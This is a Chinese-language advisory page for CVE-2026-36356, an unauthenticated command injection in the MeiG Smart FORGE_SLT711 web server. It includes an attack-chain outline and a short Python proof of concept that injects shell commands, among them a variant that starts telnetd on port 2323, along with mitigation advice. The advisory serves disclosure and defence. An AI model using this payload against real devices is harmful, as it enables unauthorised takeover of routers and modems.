CVE-2026-36356 CVSS 9.1 严重

CVE-2026-36356 MeiG Smart设备OS命令注入漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-36356

漏洞类型

命令注入

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

MeiG Smart FORGE_SLT711

漏洞概述

MeiG Smart FORGE_SLT711设备（固件版本MDM9607.LE.1.0-00110-STD.PROD-1）上的GoAhead Web服务器存在严重的远程代码执行漏洞。该漏洞由于对`/action/SetRemoteAccessCfg`端点的输入验证缺失导致。未经身份认证的攻击者可通过网络向该接口发送特制的恶意请求，在底层操作系统上执行任意命令。成功利用此漏洞可导致攻击者完全控制设备，窃取敏感数据或破坏系统完整性。

技术细节

该漏洞属于典型的操作系统命令注入（OS Command Injection）。漏洞产生的根本原因是应用程序在调用系统Shell执行命令时，直接将HTTP请求参数拼接到命令字符串中，未对特殊字符进行转义或过滤。在MeiG Smart FORGE_SLT711设备的GoAhead Web服务器中，`/action/SetRemoteAccessCfg`接口负责配置远程访问参数。攻击者通过构造特定的HTTP POST请求，在参数字段中插入分号（;）、管道符（|）或反引号（`）等Shell连接符，可以截断原有的命令逻辑并追加执行攻击者指定的任意命令。由于该漏洞无需身份验证（PR:N）且无需用户交互（UI:N），攻击者仅需知道目标设备的IP地址即可通过网络发起攻击。成功利用后，攻击者可获得Web服务器运行权限（通常为root），进而完全控制设备，造成数据泄露、服务中断或被植入持久化后门。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络端口，识别出目标设备为MeiG Smart FORGE_SLT711，并确认其Web管理界面对外开放。

STEP 2

2. 漏洞利用

攻击者向`/action/SetRemoteAccessCfg`接口发送特制的HTTP POST请求，在参数中注入恶意的Shell命令。

STEP 3

3. 命令执行

由于服务器未过滤特殊字符，后端将攻击者的输入传递给系统Shell执行，导致恶意命令在设备上运行。

STEP 4

4. 获取权限

攻击者利用执行的命令开启Telnet服务、反弹Shell或修改管理员密码，从而获取设备的最高控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://<TARGET_IP>/action/SetRemoteAccessCfg"

# Malicious payload to execute a command (e.g., telnet enable or ping)
# Adjust the parameter name based on actual form data, usually 'RemoteEnable' or similar
payload = {
    "parameter": "value; /bin/sh -c 'echo pwned > /tmp/poc.txt'"
    # or typical injection: "RemoteEnable=1; telnetd -p 2323 &"
}

try:
    # Send POST request without authentication
    response = requests.post(url, data=payload, timeout=5)
    
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Check if the command was executed on the target.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

MeiG Smart FORGE_SLT711 (Firmware MDM9607.LE.1.0-00110-STD.PROD-1)

防御指南

临时缓解措施

在未升级固件前，建议将设备放置在内网环境中，通过ACL仅允许受信任的IP地址访问Web管理界面。同时，应密切监控设备的异常流量和进程行为，以防已被入侵。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-36356
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-36356
3 Details https://www.cvedetails.com/cve/CVE-2026-36356/
4 VulDB https://vuldb.com/cve/CVE-2026-36356
5 Link http://forgeslt711.com
6 Link http://meig.com
7 Link https://github.com/totekuh/CVE-2026-36356
8 Link https://github.com/totekuh/CVE-2026-36356

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表